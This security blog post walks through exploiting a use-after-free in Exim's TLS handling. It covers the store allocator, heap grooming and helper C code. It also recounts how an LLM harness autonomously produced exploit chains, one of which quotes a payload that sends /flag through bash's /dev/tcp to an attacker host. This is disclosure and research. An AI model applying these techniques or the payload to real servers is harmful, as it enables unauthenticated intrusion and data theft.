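static void *toy_get(toy_pool *p, size_t n)
{
  n = (n + 7) & ~(size_t)7;            /* keep allocations 8-byte aligned */
  if (p->next + n > sizeof p->buf)
    return NULL;                       /* the real pool would grow instead */
  void *r = p->buf + p->next;
  p->next += n;
  return r;
}

/* Like store_mark(): an 8-byte allocation whose address is the bookmark. */
static void *toy_mark(toy_pool *p) { return toy_get(p, 8); }

/* Like the cursor part of store_reset(): everything after the mark is forgotten. */
static void toy_reset(toy_pool *p, void *mark)
{
  p->next = (size_t)((unsigned char *)mark - p->buf);
}
```

Once the cursor rewinds, everything allocated after the mark is gone. The next allocation of the same size comes back at the mark's address.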

When store_reset(mark) is called, Exim rewinds the selected store pool to the supplied mark. At that point, two interesting things happen.

The first is that the storeblocks that came after the rewind block in the chain are freed via internal_store_free() (the regular glibc free()). There is just one exception: a single storeblock sitting immediately past the rewind block can be retained, with no bump cursor on it. That retained block is the first place pool_get looks the next time the pool has to grow.

The clearest mental image I found while learning all of this came from an ASCII diagram Claude Code drew for me while I was trying to understand the allocator (memory allocators are one of the topics I'm most curious about):

chainbase ─→ A ─→ B ─→ C ─→ D ─→ NULL

^

current_block

The second interesting thing is that Exim makes the storeblock containing the mark the new current_block, and rebuilds the pool descriptor from that block's header. The key lines are these:

static void

internal_store_reset(void * ptr, int pool, const char *func, int linenumber)

{

storeblock * bb;

pooldesc * pp = paired_pools + pool;

storeblock * b = pp->current_block;

char * bc = CS b + ALIGNED_SIZEOF_STOREBLOCK;

int newlength, count;

//...

newlength = bc + b->length - CS ptr; // [1]

// ...

pp->next_yield = CS ptr + (newlength % alignment);

pp->yield_length = newlength - (newlength % alignment);

pp->current_block = b;

// ...

}

At [1], Exim computes newlength from the storeblock's length field. It then sets next_yield to the mark position (plus the alignment remainder) and sets yield_length from that computed newlength. This is the moment where an unchecked storeblock length can modify the live allocator state. If length was enlarged, the pool now believes there is free space past the real end of the malloc chunk, and later store_get() calls will be served from memory beyond that chunk.
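The arithmetic at [1] is easy to replay by hand. In this sketch, positions are offsets from the start of the storeblock, and the header is assumed to be 0x10 bytes. The mark offset of 0x100 is arbitrary. 0x3fe0 and 0xa3fe0 are the before and after length values used in the exploit plan later in this post. reset_newlength() is a hypothetical helper, not Exim code.

```c
#include <assert.h>
#include <stddef.h>

#define HDR ((long)0x10)   /* assumed ALIGNED_SIZEOF_STOREBLOCK on 64-bit */

/* Hypothetical replay of [1]: newlength = bc + b->length - ptr, where
   bc = block + HDR and ptr = block + mark_off (all relative to block). */
static long reset_newlength(size_t block_length, size_t mark_off)
{
  return HDR + (long)block_length - (long)mark_off;
}
```

With the corrupted field, the pool believes it has 0xa0000 more bytes past the mark than the underlying malloc chunk actually holds.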

The last important thing to know about the allocator is that a single command can force Exim to allocate exactly N bytes in POOL_TAINT_MAIN, where N is whatever we choose. The mechanism is an allocation that happens at parser entry, with its size controlled by the command argument.

The shape is:

MAIL FROM:sender@example.test(AAAA...AAAA)

Exim parses it, accepts it, and eventually discards it — but the storage for the address is allocated with the comment still attached.

When the SMTP command reaches the dispatch table, smtp_read_command() detects the MAIL FROM: keyword and copies the rest of the line into smtp_cmd_data:

#File: src/smtp_in.c

int

smtp_read_command(BOOL check_sync, unsigned int buffer_lim)

{

// ...

smtp_cmd_argument = smtp_cmd_buffer + p->len;

while (isspace(*smtp_cmd_argument)) smtp_cmd_argument++;

Ustrcpy(smtp_data_buffer, smtp_cmd_argument);

smtp_cmd_data = smtp_data_buffer; // [1]

// ...

}

[1] smtp_cmd_data now points at the entire string that followed MAIL FROM. In the case of our example, sender@example.test(AAAA…AAAA), comment and all.

Then that command is used to dispatch the MAIL FROM command handler:

#File: src/smtp_in.c

int

smtp_setup_msg(void)

{

// ...

case MAIL_CMD:

//...

/* Apply SMTP rewrite */

raw_sender = rewrite_existflags & rewrite_smtp

/* deconst ok as smtp_cmd_data was not const */

? US rewrite_one(smtp_cmd_data, rewrite_smtp|rewrite_smtp_sender, NULL, FALSE, US"", global_rewrite_rules) : smtp_cmd_data; //[2]

/* Extract the address; the TRUE flag allows <> as valid */

raw_sender = parse_extract_address(raw_sender, &errmess, &start, &end, &sender_domain, TRUE); //[3]

// ...

}

The call to rewrite_one() at [2] can rewrite the email address based on the Exim configuration. The resulting string is then parsed by parse_extract_address(), and the first thing it does is reserve a buffer sized from the entire input string:

#File: src/parse.c

uschar *

parse_extract_address(const uschar *mailbox, uschar **errorptr, int *start, int *end, int *domain, BOOL allow_null)

{

uschar * yield = store_get(Ustrlen(mailbox) + 1, mailbox); //[4]

const uschar *startptr, *endptr;

const uschar *s = US mailbox;

uschar *t = US yield;

*domain = 0;

// ...

s = skip_comment(s); //[5]

//...

}

At [4], mailbox is the raw argument we sent, comment included. Ustrlen(mailbox) counts every byte of it, including the comment (AAAA…). The comment is not stripped until later, at [5].

store_get(size, proto_mem) performs this allocation in POOL_TAINT_MAIN. The string came directly off the SMTP socket, so it is tainted, and the pool selector adds POOL_TAINT_BASE to the current pool.
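Sizing the comment for a given target is simple arithmetic. The argument is the address, "(", the padding and ")", and store_get() asks for strlen + 1 bytes. build_mail_from() below is a hypothetical helper that does this arithmetic. It assumes that no rewrite rule changes the string at [2], and it ignores any limit on SMTP command length. Both would need checking against a real configuration.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: build "MAIL FROM:<addr>(AAA...)\r\n" so that the
   argument after "MAIL FROM:" satisfies strlen(argument) + 1 == target.
   Assumes no rewrite rule alters the string; ignores line-length limits. */
static int build_mail_from(char *out, size_t cap, const char *addr, size_t target)
{
  static const char verb[] = "MAIL FROM:";
  size_t vlen = sizeof verb - 1;
  size_t alen = strlen(addr);
  size_t fixed = alen + 2;                  /* address plus "(" and ")" */

  if (target < fixed + 1)                   /* +1: store_get() also counts the NUL */
    return -1;
  size_t pad = target - 1 - fixed;          /* number of 'A' bytes in the comment */
  if (vlen + fixed + pad + 3 > cap)         /* + "\r\n" and our own NUL */
    return -1;

  char *p = out;
  memcpy(p, verb, vlen);  p += vlen;
  memcpy(p, addr, alen);  p += alen;
  *p++ = '(';
  memset(p, 'A', pad);    p += pad;
  memcpy(p, ")\r\n", 4);                    /* copies the terminating NUL too */
  return 0;
}
```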

Setting the challenge

We had already done part of the analysis above in the first hours after finding the bug, in order to gauge its severity. At that point we were standing in front of two doors.

Behind the first one was the temptation that anyone who has ever written exploits will recognize: try to build a real exploit (PoC||GTFO) to confirm with our own eyes that we were holding what we thought we were holding, an unauthenticated remote code execution against an Exim server.

Behind the second door was the responsible move: report now, before leaving a hole of that caliber sitting open in the wild for someone less polite to find.

We chose the second door. We sent the report and waited for the Exim team to tell us how they read the severity and what their timeline looked like. The answer came back almost immediately: a fix was applied, and we were told that in seven days the bug would go public.

Seven days gave us a narrow window to build a proof of concept and write this post. And somewhere along the way, an idea surfaced that none of us could quite let go of: we would turn those seven days into a contest. Part of the team would set an LLM loose to develop the exploit end to end, fully autonomously. It would treat the real vulnerability the same way you would hand a CTF challenge to a solver: here is the bug, here are the constraints, go find the flag. In parallel, I would develop it myself, with an LLM at my side as an assistant.

Running the race

My strategy was simple, at least on paper. The first step was to set up the following memory layout:

┌──────────────────┬──────────────┬──────────────┐
│   xfer_buffer    │     free     │     used     │
└──────────────────┴──────────────┴──────────────┘
^── start of xfer_buffer

Once the UAF fired, the plan was to reclaim the freed region with DKIM-driven allocations, so that the one-byte write would land on POOL_MAIN's storeblock metadata and inflate its length field. Something like this:

┌──────────────────────┬──────────────┐
│      storeblock      │     used     │
│   (next | length)    │              │
└──────────────────────┴──────────────┘
^
+0x0 next ptr (8 bytes)
+0x8 length field (8 bytes)  ← write at +0xa: 0x3fe0 → 0xa3fe0

With the length inflated, I would start a second TLS session and look for anything I could overlap and read back from the peer side. What I had spotted was a path through RCPT TO rejections. By sending a recipient that the ACL turned into an error response, I could plant a controlled, pointer-shaped string in Exim's heap. That same string would still be there at DATA time, when Exim echoes the rejection back to the client. As far as I could tell, it was the only user-controlled string that lived in the heap long enough to be retrievable from the peer side.
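The effect of the newline on the length field can be replayed on a plain 16-byte image of a storeblock header. This sketch assumes a little-endian 64-bit host. length_after_byte_write() is a hypothetical helper, not part of the exploit.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: build a 16-byte storeblock header image, write one
   byte at offset off, and return the 8-byte length field at +0x8.
   Assumes a little-endian host, as on x86_64. */
static uint64_t length_after_byte_write(uint64_t next, uint64_t length,
                                        size_t off, unsigned char byte)
{
  unsigned char hdr[16];
  assert(off < sizeof hdr);
  memcpy(hdr, &next, sizeof next);          /* +0x0 next pointer */
  memcpy(hdr + 8, &length, sizeof length);  /* +0x8 length field */
  hdr[off] = byte;                          /* the single stale write */
  uint64_t out;
  memcpy(&out, hdr + 8, sizeof out);
  return out;
}
```

The same write with \r (0x0d) would instead turn 0x3fe0 into 0xd3fe0.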

Of course, I was assisting the LLM as it tried to build that layout. The grooming was hard because around xfer_buffer there were a couple of tiny GnuTLS allocations that were never freed, and they made it genuinely difficult to engineer a contiguous free chunk larger than 0x4000: one big enough that, after glibc's coalescing did its job, a new pool storeblock allocation would fall exactly inside it, giving me the geometry I needed for the one-byte write to land on the metadata I actually wanted to corrupt. With a bit of luck, if the idea actually worked, we would already have one leaked address in our hands.

The plan from there was a repetition of the same shape: tear the conditions back down, re-trigger the bug, and this time use the DKIM allocation path not to target POOL_MAIN's metadata with our write, but to reclaim the freed gnutls_session_t and replace it with a forged one: valid enough, or at least populated with valid-looking pointers, to keep Exim from crashing and let us reach a state better than a bare memory leak. I had not worked out the second pass in detail. Once the address leak was solved, the geometry of the heap would have stopped being a black box, and there would have been time to figure out the rest.

To be honest, at that point I was fighting on two fronts. One was the clock. The other was myself. Half of me wanted to keep fighting with the LLM, push through, and see whether the new way actually worked. The other half wanted to do what I have always done: open the debugger and fall back on the tradecraft, the comfortable techniques every exploit writer keeps within arm's reach. But when I actually sat down to do it the old way, I caught myself thinking, against every instinct I had, that maybe the LLM would be faster. That sentence, surfacing inside my own head, was the part that unsettled me. It was the first time I had felt anxious about my own craft. The first time I no longer knew how to do the thing I had done for most of my career.

On the other side, the XBOW Native team took a simpler, more incremental approach. They built and ran the harness, but did not ask it to produce the full end-to-end exploit upfront. Instead, they progressed step by step, much like guiding a junior engineer through their first real exploit: first against the binary running without ASLR or PIE, then with ASLR enabled while PIE remained off, and finally, only at the end, with the complete exploit against the realistic build. Baby steps, by design.

Of course, the XBOW Native team knew exactly how this kind of work gets done, too. That was the entire point of their strategy. They had not handed the bug to a machine and stepped back to watch; they had taken their own understanding of how to solve it and used it to shape the LLM into something that could actually reach the answer.



By that point the first day of the challenge was already behind us, and both sides were working flat out (GPUs vs. HUMAN). While I was still wrestling with the layout, a notification surfaced on a chat channel that had been almost entirely dead until then.

I knew, abstractly, that the first stage of this was technically reachable. I had reasoned through it more than once. And still, when I read that notification, I froze. I have read enough breathless posts about LLMs writing exploits to have built up a stable, calloused skepticism around the whole topic — PoC||GTFO, again, always.

Special Delivery: The LLM Wins Round 1

The notification was from XBOW Native: it had produced a working solution for the first stage (no ASLR, no PIE, against Exim 4.97). What follows is my reconstruction of how it got there, based on the explanation Claude Code gave me afterward:

This is a walkthrough of the *Special Delivery* CTF challenge: Exim 4.97 with GnuTLS, ASLR off, non-PIE binary, fixed libc.

After the `xfer_buffer` got freed in the standard way our bug provides, the LLM's exploit chained four broad steps to land code execution. **For brevity I won't reproduce the full mechanics here** — just the shape of the chain:

1. **It corrupted a glibc largebin pointer.** When xfer_buffer was freed, glibc left its own linkage metadata (a fd_nextsize-style pointer) inside the freed region. The exploit fired the stale tls_ungetc three times across two SMTP transactions to flip exactly one byte of that pointer, redirecting it at a fake malloc chunk planted earlier inside an attacker-controlled BDAT body.

2. **It hijacked the next malloc(4096).** Exim's spool-file fdopen triggers _IO_file_doallocate, which calls malloc(4096) for a stdio buffer. glibc's largebin walk consumed the fake chunk and returned its user pointer: an attacker-chosen address that happened to sit just below the live FILE * of the spool file.

3. **It wrote through the overlapping stdio buffer into the FILE struct.** As Exim copied body bytes into the spool, the bytes flowed through the corrupted _IO_write_ptr and progressively overwrote the FILE struct: flags, pointers, lock, mode, and finally the vtable. A small in-stage trick (overwriting the low byte of _IO_write_ptr itself) let the same body buffer skip over fields that had to remain zero.

4. **It pivoted via FSOP into a ROP chain.** With the vtable now pointing at _IO_wfile_jumps - 0x48, the next fflush() dispatched through _IO_wfile_overflow → _IO_wdoallocbuf and called setcontext(fp). setcontext read its rip/rsp/rdi straight out of the corrupted FILE fields, pivoting into a tiny ROP chain that did open("/flag"), read, write to the SMTP socket fd, and _exit. The 64 bytes of /flag came back to the client in the next SMTP reply.

When I read it I almost laughed out loud. In plain terms, the chain corrupts a freed heap chunk to redirect glibc's memory allocator into returning an attacker-chosen address, then uses normal Exim I/O to overwrite a FILE struct's function table, and finally pivots through that into a ROP chain that reads the flag off disk and sends it back over the SMTP socket. The whole thing runs without credentials and without any special server configuration. That part is genuinely impressive. But the solution had an unmistakable CTF shape: a largebin attack, an FSOP gadget, and a setcontext pivot into a ROP chain, the kind of chain clearly produced by a model trained on hundreds of CTF writeups. Which is, in a way, fair.

The original challenge XBOW Native had set was deliberately a no-ASLR, no-PIE target, and under those constraints this is the kind of chain you assemble. What I had been hoping for, honestly, was something different. Something more in the spirit of the historical line of Exim work (the Qualys writeups, the older serious bugs in this same codebase), where the cleverness lives in the way the Exim allocator itself gets bent into shape, not in standard glibc-internals tricks borrowed off the shelf. I'm not sure whether that hope was reasonable. Maybe, given a no-ASLR/no-PIE binary, an off-the-shelf glibc chain really is the most efficient path and there is no elegance hiding underneath worth finding. I genuinely don't know. Still, for a moment, before I had finished thinking it through, I felt a small, slightly self-satisfied kind of relief: the kind that comes when reality half-confirms a position you had already taken.

The "exploits" that LLMs had been putting out lately read to me like publicly known techniques shoved by force into whatever situation was being attacked. I honestly couldn't tell the difference between an LLM and a genetic algorithm running hundreds of trials with a fixed menu of known options until it stumbled into something halfway decent. Maybe that is exactly what this was. Maybe that is fine.

Desperate times

Three or four days had passed by then, and I was still wrestling with the heap, still trying to push the memory regions into the shape I had imagined when I started. Several things kept getting in the way. The most stubborn was the cluster of objects living right next to xfer_buffer that simply refused to be freed. The other was me. As I said before, I was oscillating between two ways of working: staying with a static reading of the memory allocator code and using the LLM to check what I thought I understood, or putting the model aside and reaching for the debugger the way I had always done before any of this started. The specific source of the trouble with those objects was this code:

#file: src/tls-gnu.c


int

tls_server_start(uschar ** errstr, gstring * banner)

{

//...

if (!verify_certificate(state, errstr))

{

if (state->verify_requirement != VERIFY_OPTIONAL)

{

(void) tls_error(US"certificate verification failed", *errstr, NULL, errstr);

return FAIL;

}

DEBUG(D_tls)

debug_printf("TLS: continuing on only because verification was optional, after: %s\n", *errstr);

}

/* Sets various Exim expansion variables; always safe within server */

extract_exim_vars_from_tls_state(state);

//...

}

/* We set various Exim global variables from the state, once a session has

been established. With TLS callouts, may need to change this to stack

variables, or just re-call it with the server state after client callout

has finished.

Make sure anything set here is unset in tls_getc().

Sets:

tls_active fd

tls_bits strength indicator

tls_certificate_verified bool indicator

tls_channelbinding for some SASL mechanisms

tls_ver a string

tls_cipher a string

tls_peercert pointer to library internal

tls_peerdn a string

tls_sni a (UTF-8) string

tls_ourcert pointer to library internal

Argument:

state the relevant exim_gnutls_state_st *

*/

static void

extract_exim_vars_from_tls_state(exim_gnutls_state_st * state)

{

//...

const gnutls_datum_t * cert = gnutls_certificate_get_ours(state->session);

gnutls_x509_crt_t crt;

tlsp->ourcert = cert && import_cert(cert, &crt)==0 ? crt : NULL; //[1]

//...

}

The call at [1] goes into import_cert:

static int

import_cert(const gnutls_datum_t * cert, gnutls_x509_crt_t * crtp)

{

int rc;

rc = gnutls_x509_crt_init(crtp); //[2]

exim_gnutls_cert_err(US"gnutls_x509_crt_init (crt)");

rc = gnutls_x509_crt_import(*crtp, cert, GNUTLS_X509_FMT_DER); //[3]

exim_gnutls_cert_err(US"failed to import certificate [gnutls_x509_crt_import(cert)]");

return rc;

}

Both [2] and [3] perform allocations internally. However, tls_close contains the following comment:

void

tls_close(void * ct_ctx, int do_shutdown)

{

//...

tlsp->active.tls_ctx = NULL;

/* Leave bits, peercert, cipher, peerdn, certificate_verified set, for logging */

tlsp->channelbinding = NULL;

//...

}

Exim deliberately keeps those structures alive, skipping the gnutls_x509_crt_deinit call that would tear them down. Because tls_close never frees those objects, the xfer_buffer ends up stranded in the middle of live objects, which in turn blocks glibc from coalescing the freed buffer with anything adjacent. The memory layout looked roughly like this:

┌───┬───┬───┬─────────────┬───┬───┬───┐

│ X │ X │ X │ xfer_buffer │ X │ X │ X │

└───┴───┴───┴─────────────┴───┴───┴───┘

where each X stands for a couple of those tiny ASN.1/cert structs that stay alive.
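Why those pinned neighbors matter can be illustrated with a toy model of boundary-tag coalescing, in which a freed chunk merges only with free chunks that sit immediately next to it. This is an illustrative sketch, not glibc's implementation: `toy_chunk` and `toy_free` are hypothetical, there are no bins or tcache, and sizes are plain numbers. 0x1010 is the xfer_buffer chunk size given later in the post; the 0x30 neighbors are made-up placeholders for the tiny cert structs.

```c
#include <assert.h>
#include <stddef.h>

/* Toy heap: chunks laid out back to back in address order. */
typedef struct {
  size_t size;
  int in_use;
} toy_chunk;

/* Free chunk i and return the size of the contiguous free region it ends
   up in. It can only absorb neighbors that are already free; a single
   live chunk on either side stops the merge in that direction. */
static size_t toy_free(toy_chunk *c, size_t n, size_t i) {
  assert(i < n && c[i].in_use);
  c[i].in_use = 0;
  size_t total = c[i].size;
  for (size_t j = i; j > 0 && !c[j - 1].in_use; j--)
    total += c[j - 1].size;          /* merge backwards */
  for (size_t j = i + 1; j < n && !c[j].in_use; j++)
    total += c[j].size;              /* merge forwards */
  return total;
}
```

With live cert structs on both sides, the freed buffer stays an isolated 0x1010 region; with no live neighbor in the way, the same free can grow past the 0x4000 threshold mentioned earlier.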

On top of that, store_reset fired frequently while we were trying to set up the heap, and STARTTLS itself triggers a store_reset as part of its handler. That meant any grooming we built up could be undone because, as I explained earlier, when no mark is set, store_reset rewinds the pool all the way back to the start.
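The effect of a reset on grooming can be shown with a toy bump-pointer pool that follows the behavior described above: resetting to a mark rewinds to that mark, and resetting with no mark rewinds to the start. This is a simplified sketch with hypothetical names (`toy_pool`, `toy_get`, `toy_mark`, `toy_reset`, `TOY_NO_MARK`) and a made-up 16-byte rounding; it is not Exim's store.c, which manages chains of storeblocks across several pools.

```c
#include <assert.h>
#include <stddef.h>

/* Toy bump-pointer pool: one fixed buffer and a cursor. */
typedef struct {
  unsigned char mem[0x4000];
  size_t cursor;               /* offset of the next free byte */
} toy_pool;

#define TOY_NO_MARK ((size_t)-1)

/* Hand out n bytes (rounded to 16) from the cursor, or NULL if full. */
static void *toy_get(toy_pool *p, size_t n) {
  n = (n + 15) & ~(size_t)15;
  if (p->cursor + n > sizeof p->mem) return NULL;
  void *r = p->mem + p->cursor;
  p->cursor += n;
  return r;
}

/* Remember the current cursor position. */
static size_t toy_mark(const toy_pool *p) { return p->cursor; }

/* With a mark, rewind to it; with no mark, rewind to the very start. */
static void toy_reset(toy_pool *p, size_t mark) {
  p->cursor = (mark == TOY_NO_MARK) ? 0 : mark;
}
```

After a reset, the next allocation reuses exactly the space that earlier allocations occupied, which is how a reset fired by STARTTLS can quietly hand a carefully groomed region back to whatever runs next.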

It was while I was still working through how Exim implements its memory allocator that another message landed on the chat channel.



XBOW Native had cracked the second challenge: ASLR on, still no PIE. The shape of its solution went roughly like this:

1. No libc base, no heap base, no stack canary. The only addresses the exploit ever names are static binary addresses — .text, .rodata, .data, .bss — which stay fixed across runs because the binary is non-PIE. Heap and libc are randomised by ASLR, but the exploit never tries to learn where they ended up.

2. It corrupted an Exim storeblock instead of a glibc largebin chunk. It used the same one-byte UAF write through the freed xfer_buffer, but this time the byte landed on the length field of an Exim storeblock header (the pool-allocator layer above glibc, not glibc itself). Inflating the length from 0x1fe0 to 0xa1fe0 made Exim's pool 5 believe it owned a span roughly 80× larger than the underlying chunk really was.

3. It used the inflated pool as a programmable bump-pointer. With pool 5's bump cursor walking through the inflated region, each subsequent RCPT TO: and VRFY parse — through Exim's own string_copy_taint calls — landed an attacker-controlled byte sequence at the next cursor position. The exploit sends roughly 200 carefully sized SMTP commands as if they were opcodes: most just advance the cursor, a few plant pointers or strings at specific static addresses, and one of them overwrites pool 5's own chainbase so future taint checks behave.

4. It overwrote acl_smtp_predata's .bss slot to point at attacker-planted ACL text. That ACL text — also planted in static memory by the same primitive — was the canonical Exim RCE payload: ${run{/bin/bash -c 'cat</flag>/dev/tcp/$LHOST/$LPORT'}{accept}}. Then the exploit sent DATA. Exim, on receiving DATA, dereferences acl_smtp_predata and runs expand_string() on whatever it points to.

5. It exfiltrated the flag through bash's /dev/tcp, not through the SMTP reply. ${run} forks /bin/bash; bash's built-in /dev/tcp pseudo-device opens a TCP connection back to the attacker's listener, and cat writes /flag into that connection. The flag arrives at the listener over a side channel. The SMTP reply path itself is unrecoverable by then, since pool 0 has been corrupted beyond repair, but bash's stdout doesn't go through Exim's broken stdio, so the exfiltration completes before Exim crashes.

At that point I was carrying a mix of feelings. On one hand, relief that the challenge had finally been solved in a way that felt more decent: an almost-real solution tied to the target, not just generic glibc tricks. On the other hand, the need to cry, because a machine had produced a solution that I might have arrived at myself if I had been working under those same constraints. This one really was interesting: instead of continuing to attack glibc's allocator with off-the-shelf mechanisms, XBOW Native had taken on Exim's own allocator. I won't pretend it was a non-obvious move. As noted earlier, the public Exim exploits to date, CVE-2017-16943 (devco.re), CVE-2018-6789 (devco.re), Scraps of notes on exploiting Exim (Synacktiv) and CVE-2020-28018 (adepts.of0x), attack the store allocator, so the model was almost certainly drawing on those. But it was, in the genuine sense of the word, surprising.
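Step 3 of that chain, treating the inflated pool as a programmable bump pointer, can be modeled purely with offsets. In this sketch the allocator checks requests only against the length recorded in the header, so once 0x1fe0 has become 0xa1fe0 it keeps handing out offsets well past the memory that actually backs the block. `toy_block`, `toy_bump` and `toy_overflows` are hypothetical, no real memory is touched, and the 16-byte rounding is an assumption made for illustration rather than Exim's exact alignment rule.

```c
#include <assert.h>
#include <stdint.h>

/* Offsets-only model of a block whose header overstates its size. */
typedef struct {
  uint64_t real_size;    /* bytes actually backing the block */
  uint64_t claimed_size; /* length field as the allocator sees it */
  uint64_t cursor;       /* offset of the next allocation */
} toy_block;

/* Return the offset handed out, or UINT64_MAX once the *claimed* size is
   exhausted. The real size is never consulted here. */
static uint64_t toy_bump(toy_block *b, uint64_t n) {
  n = (n + 15) & ~(uint64_t)15;
  if (b->cursor + n > b->claimed_size) return UINT64_MAX;
  uint64_t off = b->cursor;
  b->cursor += n;
  return off;
}

/* True when an allocation at `off` of `n` bytes reaches past real memory. */
static int toy_overflows(const toy_block *b, uint64_t off, uint64_t n) {
  return off + n > b->real_size;
}
```

Every allocation after the first one that crosses the real end lands in whatever memory follows the chunk, which is what lets each sized SMTP command act as an opcode that writes at a predictable position.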

The result was no less interesting.

With that one solved, it was time for the other team to start the real challenge.

Honestly, I have no idea what their methodology was: whether they gave the model internet access and the prompt itself pointed it toward this kind of solution, or whether it found its way on its own. Either way, what really matters is the outcome, and the outcome was a reasonably interesting exploit.

Final Round: Team Human Wins with a Stack Leak

By this point, time was pressing harder, and I needed a different way of working. In the end, I asked the LLM to assemble a Python file containing, in one place, all the primitives we had for shaping Exim's memory the way I wanted, independent of any scaffolding I had been improvising up to then. (Honestly, working with LLMs up to that moment had been thoroughly frustrating: partly the discomfort of not having a debugger at hand, probably a tooling problem, and partly the disorganized rhythm of work it kept pushing me into.)

The Python script contained a class to manage POOL_PERM, with code to retain a storeblock so that it survived the whole process, another class for POOL_MAIN to force retention and make allocations of a controlled size, and so on, primitive by primitive. With it I had a clean way to send the exact allocations I needed, manually, and to shape the heap into whatever pattern I had in mind. One of the main problems was that most of those allocations turned out to be powers of two, with one exception: the controlled allocation we built through the MAIL FROM comment trick. That made it much harder than it should have been to reclaim the freed xfer_buffer chunk with a fresh storeblock. Either the size classes did not line up the way we needed, or we hit a timing problem: the custom-sized allocation cannot be produced inside the BDAT loop where the bug lives, so by the time we perform it, the write primitive over the freed xfer_buffer is gone.

On top of that, and even though I had not yet verified it across other configurations, something else was making me uncomfortable. There was no guarantee that the heap we were grooming was a clean heap. Every malloc and free that happened before our SMTP child process started handling the session could have left residual holes I had no visibility into. Holes like those can intercept an allocation we expect to land somewhere and silently route it elsewhere. Even if we achieved the grooming we were looking for, it might work in our own tests but not on a different host, in a different process state, or with a different glibc version, where even the same sequence of commands could produce a completely different layout.

That sent me back to an earlier phase of the work: bug hunting. I asked the LLM for a different kind of leak, a memory-consumption leak, as clean as possible. The shape I wanted was simple: one command in, some bytes consumed and never freed, with no other side effects on the heap. I could not use the memory-consumption leak we already had (the one around our xfer_buffer), because that one needs STARTTLS, and STARTTLS touches the heap too much, even creating more holes than we had at the beginning.

I described the situation I was looking for, and less than ten minutes later the LLM came back with a couple of invalid, buggy candidates, followed by this memory-consumption leak:

BOOL

exim_sha_init(hctx * h, hashmethod m)

{

switch (h->method = m)

{

case HASH_SHA1: h->hashlen = 20; gnutls_hash_init(&h->sha, GNUTLS_DIG_SHA1); break;

case HASH_SHA2_256: h->hashlen = 32; gnutls_hash_init(&h->sha, GNUTLS_DIG_SHA256); break;

case HASH_SHA2_384: h->hashlen = 48; gnutls_hash_init(&h->sha, GNUTLS_DIG_SHA384); break;

case HASH_SHA2_512: h->hashlen = 64; gnutls_hash_init(&h->sha, GNUTLS_DIG_SHA512); break;

#ifdef EXIM_HAVE_SHA3

case HASH_SHA3_224: h->hashlen = 28; gnutls_hash_init(&h->sha, GNUTLS_DIG_SHA3_224); break;

case HASH_SHA3_256: h->hashlen = 32; gnutls_hash_init(&h->sha, GNUTLS_DIG_SHA3_256); break;

case HASH_SHA3_384: h->hashlen = 48; gnutls_hash_init(&h->sha, GNUTLS_DIG_SHA3_384); break;

case HASH_SHA3_512: h->hashlen = 64; gnutls_hash_init(&h->sha, GNUTLS_DIG_SHA3_512); break;

//...

default: h->hashlen = 0; return FALSE;

}

return TRUE;

}

gnutls_hash_init allocates the state behind the gnutls_hash_hd_t handle on the glibc heap. That chunk then stays on the heap and can only be released by gnutls_hash_deinit, but Exim never calls that function.

The only constraint is that Debian's localhost relay ACL can disable DKIM verification for loopback connections, so the leak has to be reached over a remote path: I cannot target localhost:25 and need to go through an external interface.

This was going to help me in two ways. On one hand, it gave me a way to consume any pre-existing holes in the heap, so that, regardless of what the process had been doing before our SMTP session opened, we would always start from a more-or-less deterministic memory state. On the other hand, it let me fine-tune the grooming: by filling those holes with the leak primitive, I could keep any remaining gap small enough that it could not intercept the upcoming session and xfer_buffer allocations we needed to land in a predictable place.
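The hole-filling idea can be seen in a toy first-fit allocator: a few pre-existing holes sit in front of an unbounded top region, and each request is served by the first hole big enough for it. This is a deliberately simplified sketch; `toy_heap`, `toy_alloc`, the hole sizes and the 0x40 leak size are all hypothetical, and glibc's real bins, tcache and splitting rules are far more involved. Spraying small never-freed allocations, as the exim_sha_init leak allows, drains the holes until a big request has nowhere to go but the top.

```c
#include <assert.h>
#include <stddef.h>

#define MAX_HOLES 8

/* Toy heap: a few leftover holes plus an unbounded "top" region. */
typedef struct {
  size_t hole[MAX_HOLES]; /* remaining bytes in each hole (0 = used up) */
  size_t nholes;
  size_t top_used;        /* bytes carved from the top region */
} toy_heap;

/* First fit: return the index of the hole that served the request, or -1
   if it had to be carved from the top region instead. */
static int toy_alloc(toy_heap *h, size_t n) {
  for (size_t i = 0; i < h->nholes; i++) {
    if (h->hole[i] >= n) {
      h->hole[i] -= n;    /* split: the remainder stays in place */
      return (int)i;
    }
  }
  h->top_used += n;
  return -1;
}
```

Before the spray, a 0x1010 request is intercepted by the first hole; after the holes are drained, it is carved from the top, which is the predictable placement the grooming is after.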

The idea was simple: tune the hole so that, after the session and the small objects ahead of the xfer_buffer have been placed inside it, what remains is a gap smaller than 0x1010, the chunk size of the xfer_buffer itself. The leftover space stays large enough to absorb the cert chain entries and the other small leaks from import_cert we could not easily suppress, but small enough that a 0x1010-byte allocation does not fit. When the xfer_buffer's store_malloc finally fires, glibc skips this hole and places the buffer in the next free region.

Graphically it looks roughly like this:

┌─────────┬───────────────────────┬────────────────────┬─────┬─────────────┐

│ session │ small objs (cert ...) │ remainder < 0x1010 │ ... │ xfer_buffer │

└─────────┴───────────────────────┴────────────────────┴─────┴─────────────┘

so future objects will fall into the remainder hole instead of landing behind the xfer_buffer.
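The 0x1010 threshold follows from how glibc turns a request into a chunk size on x86_64: add the 8-byte size field, round up to 16 bytes, and never go below the 32-byte minimum. The sketch below mirrors that rounding (as in glibc's request2size macro) and assumes xfer_buffer is a 4096-byte request, which is consistent with the 0x1010 chunk size given above; `chunk_size_for` and `hole_can_serve` are hypothetical helpers, and real hole reuse also depends on bins and tcache.

```c
#include <assert.h>
#include <stddef.h>

/* glibc x86_64 parameters: SIZE_SZ = 8, MALLOC_ALIGNMENT = 16, MINSIZE = 32. */
#define TOY_SIZE_SZ 8u
#define TOY_ALIGN_MASK 15u
#define TOY_MINSIZE 32u

/* Chunk size glibc would use for malloc(req), following request2size. */
static size_t chunk_size_for(size_t req) {
  size_t sz = (req + TOY_SIZE_SZ + TOY_ALIGN_MASK) & ~(size_t)TOY_ALIGN_MASK;
  return sz < TOY_MINSIZE ? TOY_MINSIZE : sz;
}

/* Can a free hole with chunk size `hole` satisfy malloc(req)? */
static int hole_can_serve(size_t hole, size_t req) {
  return hole >= chunk_size_for(req);
}
```

Under that assumption, a leftover gap of 0x1000 bytes can still absorb the small cert allocations but not the 4096-byte xfer_buffer request, so the buffer is pushed into the next free region.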

